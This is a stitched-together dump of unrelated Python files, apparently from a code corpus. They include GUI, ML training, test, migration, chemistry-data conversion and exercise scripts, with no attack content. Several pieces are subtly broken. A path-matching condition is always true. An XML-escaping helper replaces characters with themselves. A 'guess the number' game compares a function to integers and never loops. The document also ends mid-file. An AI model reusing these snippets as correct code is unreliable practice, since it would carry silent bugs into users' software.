# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import wx
from fineAlignSettings import fineAlignSettings
import traceback
from fineAlignDialog import fineAlignDialog
# Panel that appears in the Instrument Control widow which is used to control
# fine aligning.
class fineAlignPanel(wx.Panel):
def __init__(self, parent, fineAlign):
super(fineAlignPanel, self).__init__(parent)
self.fineAlign = fineAlign;
self.InitUI()
def InitUI(self):
sbOuter = wx.StaticBox(self, label='Fine align');
vboxOuter = wx.StaticBoxSizer(sbOuter, wx.VERTICAL)
hbox = wx.BoxSizer(wx.HORIZONTAL)
self.fineAlignBtn = wx.Button(self, label='Fine Align', size=(75, 20))
hbox.Add(self.fineAlignBtn, proportion=0, border=0, flag=wx.EXPAND)
self.fineAlignBtn.Bind(wx.EVT_BUTTON,self.OnButton_fineAlign)
self.fineAlignSettingsBtn = wx.Button(self, label='Settings', size=(75, 20))
hbox.Add(self.fineAlignSettingsBtn, proportion=0, border=0, flag=wx.EXPAND)
self.fineAlignSettingsBtn.Bind(wx.EVT_BUTTON,self.OnButton_fineAlignSettings)
vboxOuter.Add(hbox, proportion=0)
self.SetSizer(vboxOuter)
def OnButton_fineAlign(self, event):
# Disable detector auto measurement
self.fineAlign.laser.ctrlPanel.laserPanel.laserPanel.haltDetTimer()
# Create the fine align dialog
fineAlignDlg = fineAlignDialog(self, title='Fine align', size=(300,150))
fineAlignDlg.runFineAlign(self.fineAlign)
# Enable detector auto measurement
self.fineAlign.laser.ctrlPanel.laserPanel.laserPanel.startDetTimer()
#self.fineAlign.doFineAlign()
def OnButton_fineAlignSettings(self, event):
try:
settingsDlg = fineAlignSettings(self, self.fineAlign)
except Exception as e:
dial = wx.MessageDialog(None, 'Could not initiate instrument control. '+traceback.format_exc(), 'Error', wx.ICON_ERROR)
dial.ShowModal()
settingsDlg.ShowModal()
settingsDlg.Destroy() | StarcoderdataPython |
5049121 | <filename>238. Product of Array Except Self.py
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
p = 1
res = []
for n in nums:
res.append(p)
p *= n
p = 1
print(res)
for i in range(len(nums)-1,-1,-1):
res[i] = res[i] * p
p *= nums[i]
return res
| StarcoderdataPython |
1943381 | import os
import datetime
import argparse
import numpy as np
import tensorflow as tf
from fpointnet_tiny_functional import get_compiled_model
FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0])
def read_raw_data(data_path, allowed_class, sample_limit=None):
data_filenames = sorted(os.listdir(data_path))
data_filenames = [filename for filename in data_filenames if filename.endswith('.npz')]
data_x = list()
data_y = list()
num_samples = 0
for filename in data_filenames:
file_path = os.path.join(data_path, filename)
with np.load(file_path) as data:
class_name = data['class_name']
point_data = data['points']
if class_name != allowed_class:
continue
data_x.append(point_data[:, :3].tolist())
data_y.append(point_data[:, 3].tolist())
num_samples += 1
if sample_limit and num_samples >= sample_limit:
break
return data_x, data_y
@tf.function
def sample_data(points, labels, num_points):
big_points = list()
big_labels = list()
for ind in range(points.shape[0]):
scene_points = points[ind]
scene_labels = labels[ind]
scene_size = tf.size(scene_points)
maxval = tf.math.floordiv(scene_size, 3)
mask = tf.random.uniform((num_points,), maxval=maxval, dtype=tf.int32)
new_points = tf.expand_dims(tf.gather(scene_points, mask), axis=1)
new_labels = tf.gather(scene_labels, mask)
big_points.append(new_points)
big_labels.append(new_labels)
return tf.stack(big_points), tf.stack(big_labels)
@tf.function
def flip(points, labels):
if tf.random.uniform(shape=()) >= 0.5:
return points * FLIPPING_TENSOR, labels
return points, labels
def get_arguments():
parser = argparse.ArgumentParser(description='The main training program for this fpointnet-tiny architecture.')
parser.add_argument(
'train', type=str,
help='Path to directory containing training data (XYZ points with label per point saved in the .npz format)'
)
parser.add_argument(
'val', type=str,
help='Path to directory containing validation data (XYZ points with label per point saved in the .npz format)'
)
parser.add_argument(
'-np', '--num_points', type=int, default=512,
help='Number of points to sample from each frustum'
)
parser.add_argument(
'-e', '--epochs', type=int, default=50,
help='Number of epochs to train the model for'
)
parser.add_argument(
'-b', '--batch', type=int, default=32,
help='Number of samples per batch'
)
parser.add_argument(
'-lr', '--learning_rate', type=float, default=3e-4,
help='Learning rate to use for the model'
)
parser.add_argument(
'--class_name', default='person',
choices=['person', 'car'],
help='Class to use from the KITTI dataset'
)
parser.add_argument(
'--run_id', type=str,
help='Specify an ID to use for this run, datetime if left empty'
)
return parser.parse_args()
if __name__ == '__main__':
args = get_arguments()
train_data_path = args.train
if not train_data_path or not os.path.isdir(train_data_path):
exit('Invalid train path')
val_data_path = args.val
if not val_data_path or not os.path.isdir(val_data_path):
exit('Invalid validation path')
num_points = args.num_points
num_epochs = args.epochs
batch_size = args.batch
learning_rate = args.learning_rate
allowed_class = args.class_name
run_id = args.run_id
train_x, train_y = read_raw_data(train_data_path, allowed_class)
print(f'Raw training data has {len(train_x)} samples')
val_x, val_y = read_raw_data(val_data_path, allowed_class)
print(f'Raw validation data has {len(val_x)} samples')
train_x = tf.ragged.constant(train_x, ragged_rank=1)
train_y = tf.ragged.constant(train_y, ragged_rank=1)
print(f'Sanity check for ragged tensors, x shape: {train_x.shape}, y shape: {train_y.shape}')
val_x = tf.ragged.constant(val_x, ragged_rank=1)
val_y = tf.ragged.constant(val_y, ragged_rank=1)
steps_per_epoch = np.ceil(train_x.shape[0] / batch_size).astype(np.int32)
print(f'Sanity check steps per epoch: {steps_per_epoch}')
print('#### Assembling Dataset object ####')
# TODO: Figure out how many to prefetch
sampling_lambda = lambda x, y: sample_data(x, y, num_points)
train_data = tf.data.Dataset.from_tensors((train_x, train_y)) \
.map(sampling_lambda) \
.unbatch() \
.map(flip) \
.batch(batch_size) \
.repeat(num_epochs) \
.prefetch(4)
val_data = tf.data.Dataset.from_tensors((val_x, val_y)) \
.map(sampling_lambda) \
.unbatch() \
.batch(batch_size) \
.prefetch(4)
train_time = datetime.datetime.now().strftime('%Y%m%d-%H%M%S')
if not run_id:
run_id = f'{allowed_class}-{train_time}'
log_dir = os.path.join('logs', run_id)
tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)
model_path = os.path.join('models', run_id, 'model-{epoch:03d}.h5')
os.makedirs(os.path.join('models', run_id), exist_ok=True)
cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath=model_path,
monitor='val_loss',
save_weights_only=True,
save_best_only=True,
verbose=0)
# TODO: Try different strategies for LR reducing
reduce_lr_callback = tf.keras.callbacks.ReduceLROnPlateau(monitor='loss', factor=0.6, patience=5, min_lr=1e-5, min_delta=0.001, verbose=1)
callbacks = [
tensorboard_callback,
cp_callback,
reduce_lr_callback
]
print('#### Training model ####')
model = get_compiled_model(num_points, learning_rate)
model.fit(train_data, steps_per_epoch=steps_per_epoch, epochs=num_epochs, validation_data=val_data, callbacks=callbacks)
| StarcoderdataPython |
5083640 | from __future__ import print_function
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mimetypes
import subprocess
import sys
import os
from toil.test import ToilTest, slow
from toil.test.mesos import helloWorld
class RegularLogTest(ToilTest):
def setUp(self):
super(RegularLogTest, self).setUp()
self.tempDir = self._createTempDir(purpose='tempDir')
def _getFiles(self, dir):
return [os.path.join(dir, f) for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]
def _assertFileTypeExists(self, dir, extension, encoding=None):
# an encoding of None implies no compression
onlyFiles = self._getFiles(dir)
print(os.listdir(dir))
onlyLogs = [f for f in onlyFiles if f.endswith(extension)]
assert onlyLogs
for log in onlyLogs:
with open(log, "r") as f:
if encoding == "gzip":
# Check for gzip magic header '\x1f\x8b'
assert f.read().startswith('\x1f\x8b')
else:
mime = mimetypes.guess_type(log)
self.assertEqual(mime[1], encoding)
@slow
def testLogToMaster(self):
toilOutput = subprocess.check_output([sys.executable,
'-m', helloWorld.__name__,
'./toilTest',
'--clean=always',
'--logLevel=info'], stderr=subprocess.STDOUT)
assert helloWorld.childMessage in toilOutput
def testWriteLogs(self):
toilOutput = subprocess.check_output([sys.executable,
'-m', helloWorld.__name__,
'./toilTest',
'--clean=always',
'--logLevel=debug',
'--writeLogs=%s' % self.tempDir],
stderr=subprocess.STDOUT)
self._assertFileTypeExists(self.tempDir, '.log')
@slow
def testWriteGzipLogs(self):
toilOutput = subprocess.check_output([sys.executable,
'-m', helloWorld.__name__,
'./toilTest',
'--clean=always',
'--logLevel=debug',
'--writeLogsGzip=%s' % self.tempDir],
stderr=subprocess.STDOUT)
self._assertFileTypeExists(self.tempDir, '.log.gz', 'gzip')
@slow
def testMultipleLogToMaster(self):
toilOutput = subprocess.check_output([sys.executable,
'-m', helloWorld.__name__,
'./toilTest',
'--clean=always',
'--logLevel=info'], stderr=subprocess.STDOUT)
assert helloWorld.parentMessage in toilOutput
def testRegularLog(self):
toilOutput = subprocess.check_output([sys.executable,
'-m', helloWorld.__name__,
'./toilTest',
'--clean=always',
'--batchSystem=singleMachine',
'--logLevel=info'], stderr=subprocess.STDOUT)
assert "single machine batch system" in toilOutput
| StarcoderdataPython |
3213826 | from django.core.management.base import BaseCommand
from RecommenderModule import recommendations_provider
class Command(BaseCommand):
"""Train and save popularity lists for popularity recommender."""
def add_arguments(self, parser):
parser.add_argument('min_ratings_threshold', type=int, nargs='?', default=5)
def __init__(self):
super().__init__()
def handle(self, *args, **options):
min_ratings_threshold = options.get('min_ratings_threshold', None)
print("Started training popularity recommender...")
recommendations_provider.retrain_popularity_recommender(min_ratings_threshold=min_ratings_threshold)
print("Done training popularity recommender.")
| StarcoderdataPython |
9684038 | #
import warnings
from typing import Any, Dict, Optional
BALANCE_WARNING = ("Backend {} uses a haproxy balance method {}, " "forcing to `roundrobin`.")
MAP_HOST_WARNING = ("Frontend {} map contains multiple host matches, " "only `hostReg` will be used. ({})")
MAP_PATH_WARNING = ("Frontend {} map contains multiple path matches, " "only `pathReg` will be used. ({})")
MISC_WARNING = ("{} {} contains `miscStrs`, "
"these cannot be auto migrated, please inspect "
"the final configuration and configure as needed.")
NO_SERVICES_WARNING = ("Backend {} contains more no service entry. " "Backend will not be migrated.")
MULTIPLE_SERVICE_WARNING = ("Backend {} contains more than one service entry ({}). "
"Only the first one will be used.")
PORT_WARNING = ("Backend {} does not use a portName for the endpoint. "
"The appropriate port name must be added manually.")
TCP_WARNING = ("Frontend for port {} is not HTTP/HTTPs, " "cannot auto migrate to traefik 1.7.")
V1_WARNING = "{}: EdgeLB V1 Pool format detected, only V2 is supported."
def parse_backend(backend: Dict[str, Any]) -> Dict[str, Any]:
name = backend["name"]
services = backend["services"]
if not services:
warnings.warn(NO_SERVICES_WARNING.format(name))
if len(services) > 1:
warnings.warn(MULTIPLE_SERVICE_WARNING.format(name, len(services)))
if backend.get("miscStrs"):
warnings.warn(MISC_WARNING.format("Backend", name))
if backend.get("balance", "roundrobin") != "roundrobin":
warnings.warn(BALANCE_WARNING.format(name, backend.get("balance")))
service = services[0]
endpoint = service["endpoint"]
port = endpoint.get("portName")
if not port:
warnings.warn(PORT_WARNING.format(name))
port = str(endpoint.get("port"))
# TODO(jkoelker) is it possible to determine the mesos service endpoints?
service_name = service.get("marathon", {}).get("serviceID")
if service_name:
service_name = service_name.lstrip("/").replace("/", ".")
else:
service_name = "UNKNOWN"
# TODO(jkoelker) handle rewriting requests?
return {
"balance": "roundrobin",
"service": {
"port": port,
"name": service_name,
},
}
def parse_map(frontend_name: str, m: Dict[str, Any]) -> Dict[str, Any]:
ret = {"backend": m["backend"]}
if "hostReg" in m:
if "hostEq" in m:
warnings.warn(MAP_HOST_WARNING.format(frontend_name, m))
ret["host"] = m["hostReg"]
elif "hostEq" in m:
ret["host"] = m["hostEq"]
if "pathReg" in m:
if "pathBeg" or "pathEnd" in m:
warnings.warn(MAP_PATH_WARNING.format(frontend_name, m))
ret["path"] = m["pathReg"]
elif "pathBeg" and "pathEnd" in m:
ret["path"] = "{}.*{}".format(m["pathBeg"], m["pathEnd"])
elif "pathBeg" in m:
ret["path"] = "{}.*".format(m["pathBeg"])
elif "pathEnd" in m:
ret["path"] = "{}.*".format(m["pathEnd"])
return ret
def parse_pool(pool: Dict[str, Any]) -> Optional[Dict[str, Any]]:
if pool.get("apiVersion") != "V2":
warnings.warn(V1_WARNING.format(pool.get("name", "unknown")))
return None
name = pool["name"]
haproxy = pool["haproxy"]
autopool = False
if name[:5] == "auto-":
autopool = True
backends = {b["name"]: parse_backend(b) for b in haproxy["backends"]}
frontends = {}
for frontend in haproxy["frontends"]:
if "HTTP" not in frontend["protocol"]:
warnings.warn(TCP_WARNING.format(frontend["bindPort"]))
if frontend.get("miscStrs"):
warnings.warn(MISC_WARNING.format("Frontend", pool.get("name", "unknown")))
link_backend = frontend["linkBackend"]
frontend_name = frontend.get("name")
if not frontend_name:
frontend_name = "frontend_{}_{}".format(
frontend.get("bindAddress", "0.0.0.0"),
frontend.get("bindPort", 0),
)
frontends[frontend["bindPort"]] = {
"name": frontend_name,
"port": frontend["bindPort"],
"protocol": frontend["protocol"],
"certificates": frontend.get("certificates", []),
"default_backend": link_backend.get("defaultBackend"),
"rules": [parse_map(name, m) for m in link_backend.get("map", [])],
}
return {
"autoCertificate": pool.get("autoCertificate", False),
"autopool": autopool,
"name": name,
"namespace": pool.get("namespace"),
"secrets": pool.get("secrets", []),
"frontends": frontends,
"backends": backends,
}
| StarcoderdataPython |
9759577 | from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import pytest
@pytest.fixture(autouse=True)
def browser(request):
user_language = request.config.getoption("--language")
options = Options()
options.add_experimental_option('prefs', {'intl.accept_languages': user_language})
browser = webdriver.Chrome(options=options)
browser.implicitly_wait(10)
yield browser
print("\nquit browser...")
@pytest.mark.parametrize('language', ["ru", "en-gb"])
def test_guest_should_see_login_link(browser, language):
link = f"http://selenium1py.pythonanywhere.com/{language}/"
browser.get(link)
browser.find_element_by_css_selector("#login_link")
def pytest_addoption(parser):
parser.addoption("--language", action="store", default="en", help="Choose language: en or fr") | StarcoderdataPython |
11225488 | """Convert SPRESI RD file to UDM."""
__author__ = "<NAME>"
__email__ = "<EMAIL>"
__license__ = "MIT"
import datetime
import re
import sys
from collections import namedtuple
from ctutils import clean_molecule
from rdfutils import FileFormatException, rdfile_reader
import udm
# We represent citations as named tuples rather than objects so they can be
# used as keys in a dictionary used for their de-duplication.
Citation = namedtuple('Citation',
['author', 'title', 'journal', 'year', 'volume', 'page', 'type'])
# Dictionaries and list used for compound registration and de-duplication.
compound_registry = {}
compound_names = {}
anonymous_compounds = []
def register_molecule(molfile, name, reaction_id):
"""Register a molecule specified by its molfile and name and return
identifier. The following rules are applied:
1. If the molecular structure is known (molfile not empty), it is used for
registration and de-duplication, otherwise
2. If the name of the molecule is not empty, it is used for de-duplication,
otherwise
3. A new anonymous molecule is registered with a unique ID for each empty
structure with no name."""
try:
if molfile:
cleaned_molfile = '\n'.join(clean_molecule(molfile))
if cleaned_molfile in compound_registry:
return compound_registry[cleaned_molfile][0]
c_id = len(compound_registry) + len(compound_names) + len(anonymous_compounds) + 1
cleaned_name = name
if name:
cleaned_name = name.strip()
compound_registry[cleaned_molfile] = (c_id, cleaned_name)
return c_id
elif name:
cleaned_name = name.strip()
if cleaned_name in compound_names:
return compound_names[cleaned_name]
c_id = len(compound_registry) + len(compound_names) + len(anonymous_compounds) + 1
compound_names[cleaned_name] = c_id
return c_id
else:
c_id = len(compound_registry) + len(compound_names) + len(anonymous_compounds) + 1
anonymous_compounds.append(c_id)
return c_id
except Exception as ex:
print(reaction_id, molfile)
raise ex
CATALYST_RE = re.compile(r'RXN:VARIATION:STEPNO:CATALYST\((?P<N>[0-9])\):MOL:MOLSTRUCTURE')
SOLVENT_RE = re.compile(r'RXN:VARIATION:STEPNO:SOLVENT\((?P<N>[0-9])\):MOL:MOLSTRUCTURE')
def get_catalysts(reaction):
"""Return catalysts involved in the specified reaction."""
for df in reaction.data_fields:
if CATALYST_RE.match(df):
n = CATALYST_RE.search(df).group('N')
name_field = 'RXN:VARIATION:STEPNO:CATALYST(' + n + '):MOL:SYMBOL'
if name_field in reaction.data_fields:
name = reaction.data_fields[name_field]
else:
name = ''
yield reaction.data_fields[df], name, n
def get_solvents(reaction):
"""Return solvents involved in the specified reaction."""
for df in reaction.data_fields:
if SOLVENT_RE.match(df):
n = SOLVENT_RE.search(df).group('N')
name_field = 'RXN:VARIATION:STEPNO:SOLVENT(' + n + '):MOL:SYMBOL'
if name_field in reaction.data_fields:
name = reaction.data_fields[name_field]
else:
name = ''
yield reaction.data_fields[df], name, n
YIELD_RE = re.compile(r'(?P<M>[0-9\.]+)-[0-9\.]+')
def get_yield(reaction):
"""Parse and return the yield of the specified reaction."""
yld = reaction.data_fields.get('RXN:VARIATION:PRODUCT:YIELD', None)
if yld:
# Yield value is min-max in SPRESI, but UDM expects a single value.
if YIELD_RE.match(yld):
yld = YIELD_RE.search(yld).group('M')
return yld
citations = {}
def text_to_xml(text):
return text.replace('&', '&').replace('<', '<').replace('>', '>')
def get_citation(reaction):
"""Parse and return the citation associated with the specified reaction."""
df = reaction.data_fields
title = text_to_xml(df.get('RXN:VARIATION:LITREF:TITLE', ''))
return Citation(df.get('RXN:VARIATION:LITREF:AUTHOR', ''), # author
title, # title
df.get('RXN:VARIATION:LITREF:JOURNAL_JRNL', ''), # journal
df.get('RXN:VARIATION:LITREF:JOURNAL_YEAR', ''), # year
df.get('RXN:VARIATION:LITREF:JOURNAL_VOL.', ''), # volume
df.get('RXN:VARIATION:LITREF:JOURNAL_PG.', ''), # page
df.get('RXN:VARIATION:LITREF:TYPE', '')) # type
def register_citation(citation):
"""Register the citation and return its unique identifier."""
if citation in citations:
return citations[citation]
cit_id = len(citations) + 1
citations[citation] = cit_id
return cit_id
def format_rxn_header(reaction_id):
"""Returns string containing four-line RXN header."""
# <-A6-><---A9--><---A12----><--I7->
# IIIIIIPPPPPPPPPMMDDYYYYHHmmRRRRRRR
return '$RXN\n\n INFOCHEM {:<7}\n'.format(reaction_id)
def format_rxn_block(reaction):
"""Generate and return RXN block for the given reaction."""
s = format_rxn_header(reaction.id)
s += '\n{:>3d}{:>3d}'.format(len(reaction.reactants), len(reaction.products))
for reactant in reaction.reactants:
s += '\n$MOL\n' + '\n'.join(reactant)
for product in reaction.products:
s += '\n$MOL\n' + '\n'.join(product)
return s
ReactionEntity = namedtuple('ReactionEntity', ['reaction_id', 'reactant_ids',
'product_ids', 'catalyst_ids',
'solvent_ids', 'rxn_block',
'citation_id', 'reaction_yield'])
def parse_spresi_reaction(reaction):
"""Parse the specified reaction from a SPRESI RD file, extract UDM-relevant
data and return them a new instance of ReactionEntity."""
reactant_ids = [register_molecule(r, '', reaction.id) for r in reaction.reactants]
product_ids = [register_molecule(p, '', reaction.id) for p in reaction.products]
catalyst_ids = {} # Key - the catalyst number, value - molecule ID.
solvent_ids = {} # Key - the solvent number, value - molecule ID.
for molfile, name, n in get_catalysts(reaction):
catalyst_ids[n] = register_molecule(molfile, name, reaction.id)
for molfile, name, n in get_solvents(reaction):
solvent_ids[n] = register_molecule(molfile, name, reaction.id)
citation_id = register_citation(get_citation(reaction))
rxn_block = format_rxn_block(reaction)
reaction_yield = get_yield(reaction)
return ReactionEntity(reaction.id, reactant_ids, product_ids, catalyst_ids,
solvent_ids, rxn_block, citation_id, reaction_yield)
def format_timestamp(date_time, time_zone):
"""Format and return a timestamp for the the specified date and time."""
# FIXME Improve formatting of the time zone.
return '{:%Y-%m-%dT%H:%M:%S}{}'.format(date_time, time_zone)
def write_udm_legal(fout):
fout.write(''' <LEGAL>
<PRODUCER>InfoChem GmbH</PRODUCER>
<TITLE>Sample SPRESI dataset</TITLE>
<LICENSE href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International
(CC BY-NC-SA 4.0)
</LICENSE>
<COPYRIGHT href="http://www.infochem.de">
<TEXT>Copyright (c) 2018 InfoChem</TEXT>
<OWNER>InfoChem</OWNER>
<DATE>2018</DATE>
</COPYRIGHT>
</LEGAL>
''')
def write_udm_citations(fout):
"""Write CITATIONS entity to the fout stream."""
fout.write(' <CITATIONS>\n')
for citation, citation_id in citations.items():
fout.write(udm.format_citation(citation_id, citation))
fout.write(' </CITATIONS>\n')
def write_udm_molecules(fout):
"""Write MOLECULES entity to the fout stream."""
fout.write(' <MOLECULES>\n')
for molfile, mol_info in compound_registry.items():
molecule_id, name = mol_info
fout.write(udm.format_molecule(molecule_id, molfile, name))
for name, molecule_id in compound_names.items():
fout.write(udm.format_molecule(molecule_id, '', name))
for molecule_id in anonymous_compounds:
fout.write(udm.format_molecule(molecule_id, '', ''))
fout.write(' </MOLECULES>\n')
def write_udm_reactions(fout, reaction_entities):
"""Write REACTIONS entity to the fout stream."""
fout.write(' <REACTIONS>\n')
num_reactions = 0
for reaction in reaction_entities:
num_reactions += 1
fout.write(udm.format_reaction(reaction, num_reactions <= 100))
fout.write(' </REACTIONS>\n')
def write_udm_file(filename, reaction_entities):
"""Write filename UDM file for the given set of reactions."""
with open(filename, 'wt') as fout:
fout.write(udm.get_xml_declaration())
timestamp = format_timestamp(datetime.datetime(2018, 5, 14, 13, 34, 0), '+01:00')
fout.write(udm.format_udm_open('SPRESI', 1, timestamp))
fout.write(udm.format_version_entity(5, 0, 0))
write_udm_legal(fout)
write_udm_citations(fout)
write_udm_molecules(fout)
write_udm_reactions(fout, reaction_entities)
fout.write(udm.format_udm_close())
def main():
"""Main function for conversion of SPRESI RD file to UDM."""
rd_filename = 'spresi-sample.rdf' # Default input file if none specified.
udm_filename = 'spresi.xml' # Default output file if none specified.
num_args = len(sys.argv)
if num_args >= 2:
udm_filename = sys.argv[2]
if num_args >= 1:
rd_filename = sys.argv[1]
reaction_entities = []
try:
# Read all the reactions from the input file, register the involved
# molecules and citations and store all the UDM-relevant information
# in reactions_entities.
num_reactions = 0
for reaction in rdfile_reader(rd_filename):
# We export only first 10K reactions from the SPRESI RD file provided
# by InfoChem.
num_reactions += 1
if num_reactions > 10000:
break;
reaction_entities.append(parse_spresi_reaction(reaction))
write_udm_file(udm_filename, reaction_entities)
except FileExistsError as fee:
print('error: cannot read file ' + rd_filename, fee)
except FileFormatException as ffe:
print('error: cannot parse input file line ' + str(ffe.line_no) + ':', ffe)
if __name__ == '__main__':
main()
| StarcoderdataPython |
6617359 | <gh_stars>1-10
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
from gensim import corpora
def build_lsi_model(data_path="sentences.txt",stopwords_path="stopwords_english.txt",save_dict_path="model_dict.dict",save_corpus_path="model_corpus.mm"):
documents = []
with open(data_path, encoding="utf-8") as file:
documents = [l.strip() for l in file]
stoplist = []
with open(stopwords_path, encoding="utf-8") as file:
stoplist = [l.strip() for l in file]
texts = [[word for word in document.lower().split() if word not in stoplist]
for document in documents]
# remove words that appear only once
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > 1]
for text in texts]
from pprint import pprint # pretty-printer
pprint(texts)
dictionary = corpora.Dictionary(texts)
dictionary.save(save_dict_path) # store the dictionary, for future reference
print(dictionary)
print(dictionary.token2id)
# new_doc = "Human computer interaction"
# new_vec = dictionary.doc2bow(new_doc.lower().split())
# print(new_vec) # the word "interaction" does not appear in the dictionary and is ignored
corpus = [dictionary.doc2bow(text) for text in texts]
corpora.MmCorpus.serialize(save_corpus_path, corpus) # store to disk, for later use
print(corpus)
# build_lsi_model()
| StarcoderdataPython |
1673455 | <reponame>N0mansky/countbeat<filename>vendor/github.com/elastic/beats/filebeat/tests/system/filebeat.py<gh_stars>10-100
import json
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../../../libbeat/tests/system'))
from beat.beat import TestCase
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.beat_name = "filebeat"
self.beat_path = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
super(BaseTest, self).setUpClass()
def get_registry(self):
# Returns content of the registry file
dotFilebeat = self.working_dir + '/registry'
self.wait_until(cond=lambda: os.path.isfile(dotFilebeat))
with open(dotFilebeat) as file:
return json.load(file)
def get_registry_entry_by_path(self, path):
"""
Fetches the registry file and checks if an entry for the given path exists
If the path exists, the state for the given path is returned
If a path exists multiple times (which is possible because of file rotation)
the most recent version is returned
"""
registry = self.get_registry()
tmp_entry = None
# Checks all entries and returns the most recent one
for entry in registry:
if entry["source"] == path:
if tmp_entry == None:
tmp_entry = entry
else:
if tmp_entry["timestamp"] < entry["timestamp"]:
tmp_entry = entry
return tmp_entry
| StarcoderdataPython |
5105215 | <filename>cassie/env/play.py
import gym
import time
from stable_baselines3 import PPO
from stable_baselines3.common.vec_env import SubprocVecEnv
from stable_baselines3.common.callbacks import BaseCallback
from stable_baselines3.common.results_plotter import load_results, ts2xy, plot_results
from cassie import CassieRefEnv
if __name__ == '__main__':
t = time.monotonic()
# model = PPO.load("model_saved/ppo_cassie_"+str(512 * 9)+"00")
model = PPO.load("ppo_cassie")
cassie = CassieRefEnv(dynamics_randomization=False)
obs = cassie.reset()
# print(obs)
while True:
action, _states = model.predict(obs)
obs, rewards, dones, info = cassie.step(action)
while time.monotonic() - t < 60*0.0005:
time.sleep(0.0001)
t = time.monotonic()
cassie.render()
if dones:
obs = cassie.reset()
# print(obs)
| StarcoderdataPython |
6463159 |
# Write a function that selects a random number and then asks the user to guess what that number is.
# They should be told if they are higher or lower than the result, track the number of guesses they take to get the correct value.
# If they do not guess correctly, ask them again until they do.
from random import randint
print(randint(0, 100))
def my_function():
print("try guess the number..")
if randint == 0:
print("answer is to low")
print("guess again..")
elif randint == 100:
print("answer is to high")
print("guess again..")
else:
print("answer is correct")
my_function()
| StarcoderdataPython |
6548735 | <gh_stars>0
# Is Unique
# Implement an algorithm to determine if a string has all unique characters.
# What if you cannot use additional data structures?
def isUnique(text_string):
if(len(set(text_string)) == len(text_string)):
return True
return False
# Sort string approach
def isUniqueNoDS(text_string):
sorted_string = sorted(text_string)
for index, char in enumerate(sorted_string):
if index == 0:
next
if char == sorted_string[index - 1]:
return False
return True
# Create your own hash table approach
# I read through the hints
if __name__ == "__main__":
print(isUniqueNoDS('mango'))
print(isUniqueNoDS('apple')) | StarcoderdataPython |
3326388 | """
L2 integration tool methods
"""
from cobra_apic_base import cobra_apic_base
from cobra.model.fv import Tenant, BD, Subnet, AEPg, Ap, RsProv, RsCons, RsDomAtt, RsPathAtt, RsCtx, RsPathAtt
from cobra.mit.request import ClassQuery
from cobra.modelimpl.fabric.protpol import ProtPol
from cobra.modelimpl.fvns.encapblk import EncapBlk
from cobra.modelimpl.infra.accportp import AccPortP
from cobra.modelimpl.infra.hports import HPortS
from cobra.modelimpl.infra.rsaccbasegrp import RsAccBaseGrp
from cobra.modelimpl.infra.rsaccportp import RsAccPortP
from cobra.modelimpl.infra.portblk import PortBlk
from cobra.modelimpl.infra.nodep import NodeP
from cobra.modelimpl.infra.leafs import LeafS
from cobra.modelimpl.infra.nodeblk import NodeBlk
from cobra.modelimpl.infra.accbndlgrp import AccBndlGrp
from cobra.modelimpl.infra.rsattentp import RsAttEntP
from cobra.modelimpl.infra.rshifpol import RsHIfPol
from cobra.modelimpl.infra.rsl2ifpol import RsL2IfPol
from cobra.modelimpl.infra.rslacppol import RsLacpPol
from cobra.modelimpl.infra.rslldpifpol import RsLldpIfPol
from cobra.modelimpl.infra.rsmcpifpol import RsMcpIfPol
from cobra.modelimpl.infra.rsmonifinfrapol import RsMonIfInfraPol
from cobra.modelimpl.infra.rsstormctrlifpol import RsStormctrlIfPol
from cobra.modelimpl.infra.rsstpifpol import RsStpIfPol
from cobra.modelimpl.infra.rscdpifpol import RsCdpIfPol
from cobra.modelimpl.fvns.vlaninstp import VlanInstP
from cobra.modelimpl.infra.rsvlanns import RsVlanNs
from cobra.modelimpl.phys.domp import DomP
from cobra.modelimpl.infra.attentityp import AttEntityP
from cobra.modelimpl.infra.rsdomp import RsDomP
from cobra.modelimpl.fabric.explicitgep import ExplicitGEp
from cobra.modelimpl.fabric.nodepep import NodePEp
from cobra.modelimpl.fabric.hifpol import HIfPol
from cobra.modelimpl.lacp.lagpol import LagPol
from cobra.modelimpl.cdp.ifpol import IfPol
from cobra.modelimpl.fv.ctx import Ctx
from cobra.modelimpl.infra.accportgrp import AccPortGrp
from cobra.mit.request import DnQuery
from cobra.modelimpl.fv.subnet import Subnet
from constant import *
import re
__author__ = '<NAME> (<EMAIL>)'
""" Helpers """
def natural_keys(text):
'''
list.sort(key=natural_keys) sorts in human order
'''
return [atoi(c) for c in re.split('(\d+)', text)]
def atoi(text):
return int(text) if text.isdigit() else text
""" All calls to APIC are done using the following class """
